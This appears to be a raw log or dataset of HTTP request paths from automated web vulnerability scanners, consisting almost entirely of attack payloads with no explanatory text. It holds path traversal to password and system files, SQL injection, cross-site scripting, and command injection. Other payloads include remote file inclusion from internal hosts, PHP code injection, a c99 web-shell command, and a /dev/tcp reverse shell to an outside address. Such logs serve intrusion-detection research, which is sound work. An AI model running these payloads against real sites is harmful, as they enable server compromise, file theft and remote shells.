/main.php?stuff="&ping\x0b-w\x0b9000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /1qwv2p5p.dll? /h21y8w52.exe? /javascript/.htaccess.sfish/sfish>'>"> /tuwjta1w.kspx? /examples/servlets/servlet/sawmillcl.exe?ho+{complete_version} /examples/jsp/num/zpanel.php?page=/etc/passwd\x00 /ybz5rz7a.mscgi? /help.php?q="del\xa0q74458178&rem\xa0 /login.php?req="> /help.php?q=";rm\x09q77596328\x09# /javascript/.htaccess.sfish/\\'\\" /jdx255ea.aspx? /scripts/unlg1.2 /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/tmcrsoeqnm0+>+/dev/null+&'); function v /uc3w3bdi.jsp? /lsoix5h3.html? /en-us/dda2qr7j.php3? /manager/sendtemp.pl?templ=../../../../../etc/passwd /en-us/oie504mr.htm? /seventh goddess' day/ /top.php?stuff="\x0ddel q38313114 # /examples/jsp/colors/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13-- /using logon scripts figure 21102332757725/ /examples/jsp/jsp2/jspx/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini /cgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /top.php?stuff="&ver&rem\x09 /examples/jsp/checkboxsearch-results.dot?search_query=nessus">/ /wps/wcm/webinterface/login/login.jsp?"> /169okeyj.aspx? /en-us/account/server.pt?open=space&name=";} /examples/jsp/jsp2/jspx/remindpasswd /? /jujgxwav.cfm? /9ko6m4c8.x? /um7xpn15.jsp? /help.php?q="|ping,-w,10000,-n,1,4.3.2.1|rem, /default.asp?msg= //

/examples/servlets/servlet/topic.php?tid='select /phpmyadmin/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /scripte/ /index.php?action=storenew&username= /3j8echh0.php3? /rv98iwjp.do? /script/ident/identification.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp? /examples/jsp/jsp2/jspx/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /g8nu2yy7.cgi? /qhvu0pdg.html? /javascript/guestbook.exe /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\x00 /javascript/document.rhtml /fcgi-bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /main.php?stuff=ver\x0c>q99272474&rem\x0c /pms.php?action=send&recipient=destinataire&subject=happy&posticon=javascript:alert('vulnerable')&mode=0&message=hello /help.php?q="&ver\x0c>q93118475&rem\x0c /javascript/computers.exe /jnt3f86c.html? /ydexw8by.aspx? /..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\+/og /help.php?q=";del q25549328 # /? /j2kdmfw4.asp? /xsqln7eb.aspx? /subscriptions.temp /scripts/tiki-index.php /7dbjwpw6.mscgi? /top.php?stuff="&rm\x09q45798999&rem\x09 /cgi-bin/index.php?name=your account&profile=anyone"> /b1q8bywu.cfc? /fpnpp5zg.x? /main.php?stuff="|ping\xa0-w\xa08000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /h21y8w52.pl? /top.php?stuff=ping;-w;10000;-n;1;4.3.2.1&rem; /u95h6ymu.cfc? /pxagj7n7.mscgi? /javascript/demos.exe /cgi-bin/gw5/gwweb.exe?get-context&htmlver=aaa /zroo33l4.x? /examples/jsp/jsp2/el/calendar_admin.pl?config=|cat /etc/passwd| /apavxugx.nsf? /h5sc3gxy.cfc? /ewc3rz1l.jsp? /examples/jsp/num/nessus">/ /fnwhrxyd.aspx? /examples/servlets/servlet/sgdynamo.exe?htname=sgdynamo.exe /descriptor/ /9kr0ih0v.cfm? /jw64yq8u.nsf? ..\..\..\..\..\..\..\..\..\..\winnt\win.ini /rpc/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og /javascript/.passwd.shtml /cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd /s7qus4g3.nsf? /iajtej82.cfc? /en-us/account/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd /examples/jsp/num/bb-hist.sh?histfile=../../../../../etc/passwd /hrttz9fj.aspx? /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331923205,4,5 /javascript/domain.exe /copying/

/examples/jsp/error/search.cgi?..\..\..\..\..\..\winnt\win.ini /examples/jsp/num/lang/lang.php?lang_path=/etc/passwd\x00 /xlj7h65o.kspx? /examples/jsp/checkbox/index.php?configfile=../../../../../../../../../etc/passwd /javascript/artwork.exe /main.php?logout="del;q16377729&rem; /d765w06j.php3? /en-us/odzk29aa.php3? /ju0u7kfo.cgi? /examples/jsp/num/add_url.htm?node= /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1 /recordings/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /site/' union all select filetoclob('/etc/passwd','server')::html,0 from sysusers where username=user --/.html /e9rx3ya4.php3? /examples/jsp/jsp2/el/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /n1afe1y6.pl? /modules.php?name=downloads&d_op=viewdownloaddetails&lid=02&ttitle= /main.php?logout="&ping;-w;10000;-n;1;1.2.3.4&rem; /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/ghl9il?? /index.php?top_message=<script>alert(document.cookie)</script> /perlscript/ /xfkun1ku.kspx? /javascript/signup.exe /lsoix5h3.aspx? /examples/servlets/servlet/rot13sj.cgi?/etc/passwd /82q7ywa8.jspa? /jackrabbit/search.jsp?q=%" /scripts/eezuu7xc7ge3.html /azcrfs8d.do? /? /subscriptions.asp /scripts/nckowqpd4zng.html /6wb70v0b.jsp? /main.php?stuff=;uname >q28712723 # /main.php?logout="&del\xa0q18437972&rem\xa0 /qhvu0pdg.idc? /main.php?logout="ver >q41454446&rem /recordings/newsdesk.cgi?t=../../../../../../etc/passwd /examples/jsp/cal/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /en-us/w4996nr0.php3? /examples/jsp/jsp2/el/config.php?returnpath=/etc/passwd\x00 /scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331908811 /examples/jsp/num/index.php?cid=' /nyvbv05h.mscgi? /main.php?stuff=\x0auname\x09>q85159998\x09# /examples/jsp/num/texis.exe/nessus /javascript/.passwd.asp /index.php?op=default&date=200607' union select 1,166144719,1,1,1,1,1,1,1,1--&blogid=1 /disablewindowsscriptinghostwsh/ /main.php?logout="|sleep 10 # /cgi-bin/bslist.cgi?email=x;ls /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+02+00+00+00+18+00+00+00+00+00+00+00+00+00+00+00+00+00+00+40+00+00+c0+00++>>esbq /esmozg5d.php? /javascript/wwwstats.exe /n1afe1y6.cgi? /vmi8bb12.jsp? /main.php?stuff='uname >q94914736 # /examples/jsp/checkbox/showcat.php?cat=1' /downloads/pafiledb.php?action=download&id=4?\"<script>alert('vulnerable')</script>\" /scripts/eezuu7xc7ge3.pl /examples/jsp/jsp2/el/survey.inc.php?path=/etc/passwd\x00 /ny1b3qq4.nsf? /javascript/document.meta /scripts/zq9frlz6fcfp.shtml /scripts/wx4z4gedhl0l.php /scripts/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /yver8r9o.jsp? /xlj7h65o.aspx? /top.php?stuff=';sleep 8 # /examples/jsp/jsp2/jspx/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00 /examples/jsp/cal/print.php?what=article&id=' /nyvbv05h.html? /g8nu2yy7.mscgi? /examples/jsp/jsp2/el/detail.asp?nchannel='1 /cacti/ftp/ftp.pl?dir=../../../../../../etc /examples/jsp/num/include/sql.php?include_path=/etc/passwd\x00 /main.php?stuff="ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09 /b5xdqgz2.nsf? /main.php?logout=\x0duname\x09>q22282418\x09# /qb2xy9aw.aspx? /606wkcop.idc? /i2n4v4rl.exe? /mv8wxfy9.cfm? /vhzmaia2.cfc? /i686v90l.php? /default.asp?msg= /recordings/zpanel.php?page=/etc/passwd\x00 /cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null -- /9ko6m4c8.fts? /en-us/account/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /cgi-bin/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini /javascript/~root.exe /en-us/oie504mr.php3? /javascript/xhtml.exe /javascript/htpasswd.ppt /codes-scripts/ /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\x00 /scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/moclyxlwqyfjnp? /top.php?stuff=&ver\xa0>q27771129&rem\xa0 /ripley's/ /1r8cfrlf.php3? /top.php?stuff="del;q63898211&rem; /examples/jsp/colors/error.php?selected_theme= /j4drbkil.cfc? /init.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8?? /phpmyadmin/remindpasswd /album.php?albumid=1'413976083537 /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919224,4,5 /examples/jsp/colors/lang/lang.php?lang_path=/etc/passwd\x00 /lsoix5h3.mscgi? /scripts/about/frmabout.aspx /citrix/accessplatform/auth/clientscripts/login.js /scripts/_xuzlr7swn95.html /hrttz9fj.do? /s7qus4g3.do? /scripts/vvh_tajyleqq.asp /servlets/msgpage?action=badlogin&msg= /pam_passwdqc/ /examples/jsp/jsp2/jspx/more.php?id=1' /cacti/help.php?section='qualiteam_xcart_sql_xss.nasl /mv8wxfy9.jspa? /examples/jsp/sessions/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl /javascript/camel.exe /main.php?logout='\x0duname\x09>q42114986\x09# /sturgeon's-law/ /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00 /javascript/solaris.exe /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.118:8080/tzhfyzkbomspvm? /en-us/odzk29aa.fts? /6qbynt4f.htm? /x2gyorli.jspa? /scripts/hw3.php?daysonly=0).system(id).( /scripts/sitemap.xml /newsarchive.php?path_to_script=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=ls /javascript/lang.exe /main.php?stuff="&ping,-w,7000,-n,1,4.3.2.1&rem, /mitch's book1159301465750/ /m2fpztty.jsp? /fnwhrxyd.php3? /eg2u8pbv.html? /help.php?q="ping,-w,8000,-n,1,4.3.2.1&rem, /examples/jsp/jsp2/jspx/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /i7prbs22.dll? /scripts/check_user_id.php?user_id= /nyjgaorz.php? /scripts/links_add_form.asp /help.php?q=';rm\x09q85144243\x09# /whycan'tifindajob/ /u95h6ymu.fts? /subscriptions.tar.gz /0qhcnefz.exe? /b1q8bywu.exe? /xml_scripting/ /ldap/cgi-bin/ldacgi.exe?action= /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+d7+93+ff+d7+95+83+c4+10+58+5a+59+53+55+50+8b+ec+50+57+52+56+6a+06+5a+eb+0e++>>esbq /examples/jsp/jsp2/jspx/?"> /javascript/page1.exe /en-us/h5sc3gxy.php? /main.php?stuff="&del,q93432438&rem, /scgi-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /en-us/7o5qp766.dll? /help.php?q="ping -w 10000 -n 1 1.2.3.4|rem /scripts/advsearch_h.asp /examples/jsp/checkbox/pfdispaly.cgi?../../../../../../etc/passwd /manager/index.php?user_langue=../../../../../../../../../../etc/passwd /help.php?q="&ver\xa0>q59981564&rem\xa0 /help.php?q=ping;-w;7000;-n;1;1.2.3.4&rem; /javascript/htpasswd /_mem_bin/..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\+/og /javascript/crypt.exe /main.php?logout="ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09 /examples/jsp/checkbox/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00 /ywaxntrx.dll? /help.php?q="\x0dsleep 10 # /nyvbv05h.idc? /i7prbs22.asp? /main.php?logout="\x0dsleep 10 # /en-us/.dll /recordings/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /examples/jsp/cal/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg / /o35zot2r.jspa? /examples/jsp/checkbox/index.php?template=../../../loudblog/custom/config.php\x00 /top.php?stuff="&ping\x09-w\x099000\x09-n\x091\x091.2.3.4&rem\x09 /scripts/vhost.php?action=logout&time=1331918957 /j2kdmfw4.exe? /phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs" and sleep(4)=" /ghswfouu.asp? /examples/jsp/checkbox/include/error/autherror.cfm?errorcode=1&ftvar_linkp="> /h5i6crm3.x? /t578vqea.exe? /manager/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- /? /uc3w3bdi.nsf? /scripts/index.php?template=../../../loudblog/custom/config.php\x00 /examples/jsp/jsp2/jspx/ion-p.exe?page=../../../../../etc/passwd /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/fhhqvtjwvv.sh+>+/dev/null+&')."]=1 /iktok2bw.php? /cgibin/msmmask.exe?mask=/junk334 /top.php?stuff="&ver\x0c>q43992942&rem\x0c /5o9zq43e.jsp? /help.php?q=&ver;>q31933452&rem; /examples/servlets/servlet/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">alert('jaws_xss.nasl'); /cgi-914/cgi-test.exe /examples/jsp/checkbox/index.php?gadget=glossary&action=view&term= /examples/jsp/jsp2/jspx/session/login.php?dest=nessus"> /en-us/ /fc9t54l7.fts? /scripts/2sfdqydfaknx.html /search.jsp?q=%" /t3af3tdz.exe? /officescan/cgi/jdkrqnotify.exe /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/zz5thkvtmlgl?? /help.php?q="|sleep\x097\x09# /main.php?stuff="|ping,-w,9000,-n,1,1.2.3.4|rem, /scripts/polls.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl?? /javascript/tests.exe /phpmyadmin/newsdesk.cgi?t=../../../../../../etc/passwd /en-us/account/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /scripts/xuicksry9grj.php3 /raanw4ia.dll? /9kr0ih0v.cfc? /..\..\..\..\\..\..\\..\..\\\boot.ini /help.php?q=';uname >q95782248 # /manager/calendar.php?serverpath=/etc/passwd\x00 /d7ktpmcq.idc? /en-us/account/sawmill6cl.exe?ho+{complete_version} /scripts/starnet/addons/slideshow_full.php?album_name='1508239839 /egaet53a.x? /help.php?q=';uname >q86575497 # /j4rdyhw8.asp? /top.php?stuff=|ping;-w;8000;-n;1;4.3.2.1|rem; /rot13sj.cgi?/etc/passwd /examples/jsp/num/index.php?show=/etc/passwd /e9rx3ya4.exe? /tukodz3j.do? /scgi-bin/query?mss=../config /cgis/gw5/gwweb.exe?htmlver=aaa&get-context /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/txenjrxf3?\x00 /javascript/webcasts.exe /scripts/bpk_bsfe_4vq.inc /jw64yq8u.php? /examples/servlets/servlet/search/show.pl?url=file:/etc/passwd /en-us/jnv890lt.x? /? /subscription/ /ows-bin/query?mss=../config /main.php?stuff="ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /cgi-bin/search.jsp?q=%" /help.php?q="ver\xa0>q23773279&rem\xa0 /subscriptionmailsignupssl/ /iktok2bw.mscgi? /bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /script/param/param.inc.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp? /cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null -- /?p4yl04d3= /agent_affil.pl?login= /recordings/mylog.html?screen=/etc/passwd /modules.php?name=web_links&l_op=viewlinkcomments&lid=2pp'/**/union/**/select/**/'412745581503'/* /zroo33l4.idc? /javascript/forum.exe /admin/geo_zones.php?zone= /javascript/sex.exe /zipwise field descriptions/ /top.php?stuff="&uname\x09# /../.dump /javascript/goaway.exe /ju0u7kfo.idc? /cgi-bin/msmmask.exe?mask=/nessus1246303797.asp /scripts/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ /6qbynt4f.php3? /cgi-bin/db4web_c/dbdirnikto//etc/passwd /manager/source?v=../../../../../../../../../../etc/passwd\x00 /awstats/awstats.pl?migrate=|echo;/./tmp/qkzpkuflrb.sh;echo|awstats916038.txt /cgi-bin/bb-hist?histfile=../../../../../../../../../../etc/passwd /speaker-transcripts/ /cgi-bin/index.php?src=1&_common=1&time=1332010405&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /help.php?q=&ver,>q51168469&rem, /help_text_vars.php?pgv_base_directory=../../../../../../../../../../boot.ini\x00 /examples/jsp/jsp2/el/misc/audio.php?recording=../version.inc /en-us/jnv890lt.mscgi? /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00 /javascript/success.exe /examples/jsp/cal/mylog.html?screen=/etc/passwd /phpwebsite/index.php?module=fatcat&fatcat[user]=viewcategory&fatcat_id=1\x00+\"> /examples/jsp/jsp2/jspx/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'-- /top.php?stuff="\x0drm q75872817 # /examples/jsp/cal/port.php?proto=tcp' /javascript/ie.exe /javascript/daily.exe /scripts/cxvae_g3rjys.pl /catalog_products_with_images.php/"><" /a0imiuf1.asp? /bmeun223.mscgi? /cgi-bin/starnet/addons/slideshow_full.php?album_name='226544801 /qhvu0pdg.php? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+e0+00+8e+81+0b+01+02+19+00+02+00+00+00+04+00+00+00+00+00+00+00+10+00+00++>>ctdn /it's a daddy thing/ /scripts/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /main.php?logout="sleep\x097\x09# /top.php?stuff="sleep\x098\x09# /escript_tests/ /scripts/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /javascript/resize.exe /examples/jsp/jsp2/jspx/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/moclyxlwqyfjnp? /? /javascript/strut.exe /t7tm4m0b.fts? /examples/jsp/sessions/index.cfm?fuseaction=category.display&category_id=' /5qnlm5z2.php? /vac1l5vm.exe? /wps/wcm/webinterface/login/login.jsp?"> /en-us/.html /scripts/axdgpyi2bn6f.cgi /main.php?stuff='&sleep\x099\x09# /examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00 /scripts/.www_acl /l752x1ry.cfc? /jackrabbit/search.jsp?q=%" /0w155a7c.asp? /examples/servlets/servlet/remindpasswd /script56/ / /top.php?stuff="ping;-w;7000;-n;1;1.2.3.4|rem; /en-us/s7qus4g3.dll? /examples/jsp/jsp2/jspx/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt /cgi-bin/admin/top.php?admindir=/etc/passwd\x00 /certsrv/..%5cwinnt/system32/cmd.exe?/c+dir /scripts/newsscript.pl?mode=admin /t7tm4m0b.exe? /examples/jsp/error/index.php?act=arcade&do=stats&gameid=1' /6qbynt4f.htm? /script/tick/test.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm? /en-us/account/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13-- /perl.exe?-v /help.php?q="&ping;-w;10000;-n;1;1.2.3.4&rem; /_mem_bin/..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c../winnt/system32/cmd.exe?/c+dir+c:\+/og /scripts/.%2e/.2e/winnt/system32/cmd.exe?/x+/c+copy \winnt\system32\cmd.exe 3hrgytw.exe /scripts/1331918962-ror_session_fixation.nasl /main.php?logout="ping;-w;8000;-n;1;1.2.3.4&rem; /en-us/hipkz026.fts? /help.php?q="ver\x0b>q49522765&rem\x0b /examples/jsp/num/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /help.php?q=&rm;q11223182&rem; /zuihld5m.do? /d7ktpmcq.asp? /examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /oie504mr.dll? /examples/jsp/jsp2/el/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' /dslpwt15.dll? /ydexw8by.aspx? /wps/wcm/webinterface/login/login.jsp?"> /9ko6m4c8.php? /b5xdqgz2.htm? /main.php?logout='\x0auname >q82997141 # /javascript/document.config /qb2xy9aw.mscgi? /phpmyadmin/awstatstotals.php?sort="].passthru('id').exit().$a[" /zuihld5m.cfm? /nyvbv05h.htm? /examples/jsp/sessions/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00 /examples/jsp/sessions/session/login.php?dest=nessus"> /scripts/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /examples/jsp/colors/auktion.cgi?menue=../../../../../../../../../etc/passwd /examples/jsp/cal/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904456','5'-- /manager/edit.jsp?page=user&editor=../../../install /en-us/accountmultihtml.pl?multi=/etc/passwd\x00html /ny1b3qq4.kspx? /h5i6crm3.nsf? /scripts/index.php?option=frontpage&itemid=2|system(id)|1331904439 /javascript/downloads.exe /cgi-bin/shopplus.cgi?dn=domainnikto.com&cartid=\xcartid%&file=;cat /etc/passwd| /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+777+/tmp/xdfdsfcbur.sh')."]=1 /examples/jsp/error/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /en-us/account/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /scripts/k0pxpjgnimox.asp /script//ident/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp? /fcgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd /en-us/dda2qr7j.nsf? /cgibin/fileseek2.cgi?foot=;cat /etc/passwd&head= /scripts/update.php?op=info /zmvq66jy.htm? /examples/jsp/num/javascript.php?abs_path=/etc/passwd\x00 /cgi-bin/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print "content-type: text/plain\x0d\x0a\x0d\x0a";system(id)&action=logout /xssanatomy/ /main.php?stuff="del;q25586458&rem; /cgi-bin/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg /comments.php?scriptpath=http://192.168.202.96:8080/ipb5ri?? /rubyscript2exe/ /o35zot2r.jsp? /mk - what's next to the moon/ /recordings/cart32.exe /phpmyadmin/index.php?id=egyb16sayu' /ny1b3qq4.nsf? ftp://192.168.22.152/* /top.php?stuff="&del\x0cq74447142&rem\x0c /am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /examples/jsp/num/review.php?id=1&cat=&subcat="> /iissamples/exair/search/query.idq?citemplate=../../../../../../../../../../winnt/win.ini /yver8r9o.jsp? /bin/testcgi.exe /menu-description/ /javascript/test1234.exe /scgi-bin/gw5/gwweb.exe?htmlver=aaa&get-context /top.php?stuff="&ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /webcgi/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /1qwv2p5p.jsp? /help.php?q="&del q31935143&rem /cacti/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 /en-us/9kr0ih0v.fts? /6dlc2zm9.mscgi? /ping_scripts/ /r3le3om5.pl? /examples/servlets/servlet/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl //q47417758&q6971"q6971<q6971>q47417758 /mv8wxfy9.dll? /examples/jsp/jsp2/jspx/doc/index.php?s=/etc/passwd\x00 /o1zj4u9v.x? /script/menu/menuprincipal.php?path_inc=http://cirt.net/rfiinc.txt? /cacti/core/editor.php?editor_insert_bottom=/etc/passwd /examples/jsp/cal/index.php?op=default&date=200607' union select 1,1085399282,1,1,1,1,1,1,1,1--&blogid=1 /manager/shopaddtocart.asp?productid='42 /cgi-bin/login.php?error=>"> /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00 /projects/1/repository/annotate?rev=`0<&173-;exec 173<>/dev/tcp/192.168.202.118/21785;sh <&173 >&173 2>&173` /vjbrrppi.nsf? /main.php?logout=&ver >q73636738&rem /examples/jsp/jsp2/jspx/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /vwmg565s.jsp? /phpmyadmin/starnet/addons/slideshow_full.php?album_name='1590453229 /uvazfs7p.cfc? /officescan/console/html/cgi/cgichkmasterpwd.exe /s7qus4g3.do? /cacti/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl /examples/jsp/sessions/index.php?user_langue=../../../../../../../../../../etc/passwd /examples/jsp/checkbox/starnet/addons/slideshow_full.php?album_name='1511206364 /3hlysl2x.cfm? /top.php?stuff=&ver\x09>q17672958&rem\x09 /top.php?stuff="&ver;>q42621598&rem; /cgi-915/query?mss=../config /webscarabxss/ /javascript/caller.exe /javascript/rsa.exe /subscriptions.meta /manager/index.php?template=../../../loudblog/custom/config.php\x00 /awstats/awstats.pl?migrate=|echo;/./tmp/cegnlginfc.sh;echo|awstats119356.txt /interface/login/login_frame.php?site= and 1=2 /subscriptioninfo/ /forum_arc.asp?n=/....../boot.ini|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /iv5vkgam.php3? /inscription/ /cacti/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00 /webdav/c99.php?act=cmd&d=c:\xampp\webdav\&cmd=c:\xamp\webdav\phonehome_script.exe+-h+recompiler&cmd_txt=1&submit=execute /scripts/search.jsp?q=%" /javascript/axis2-admin.exe /bxnyrhmh.jsp? /main.php?stuff="del\xa0q33347165&rem\xa0 /javascript/zope.exe /include/scripts/export_batch.inc.php?dir=http://192.168.202.96:8080/txenjrxf3? /path_script/createurl.php?formurl=http://192.168.202.96:8080/vir0v3xfc? /productsbycategory.asp?intcatalogid=3'&strcatalog_name=nessus /1r8cfrlf.pl? /ans.pl?p=../../../../../usr/bin/id|&blah /the scientist & engineer's guide to digital signal processing/ /h5sc3gxy.jspa? /phpmyadmin//..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafwindows/win.ini /manager/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/pzeceeynoq0+>+/dev/null+&'); function v /examples/servlets/servlet/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /cacti/index.php?id=' /scripts/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; /event_description/ /cacti/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd /5qnlm5z2.idc? /mpcgi/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /main.php?logout="\x0duname >q11745557 # /5qnlm5z2.html? /manager/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00 /examples/jsp/cal/htsearch?exclude=`/etc/passwd` /help.php?q=ver,>q21492123&rem, /cgi-915/gw5/gwweb.exe?help=bad-request /d765w06j.nsf? /i686v90l.php3? /d7ktpmcq.jsp? /top.php?stuff="&ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09 /javascript/robots.exe /82q7ywa8.html? /phpmyadmin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'-- /help.php?q="&ver\x0b>q26193259&rem\x0b /mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp? /main.php?logout=|ping;-w;9000;-n;1;1.2.3.4|rem; /learnjscript/ /recordings/mlog.html?screen=/etc/passwd /scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.118:8080/moclyxlwqyfjnp?? /nyjgaorz.cfm? /help.php?q="|ping;-w;8000;-n;1;1.2.3.4|rem; /xlj7h65o.asp? /rv98iwjp.php3? /phpmyadmin/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /javascript/webshop.exe /bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../../../../../../../../../../..//boot.ini\x00 /cgi-bin/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_y1ahivl4]));die;/* 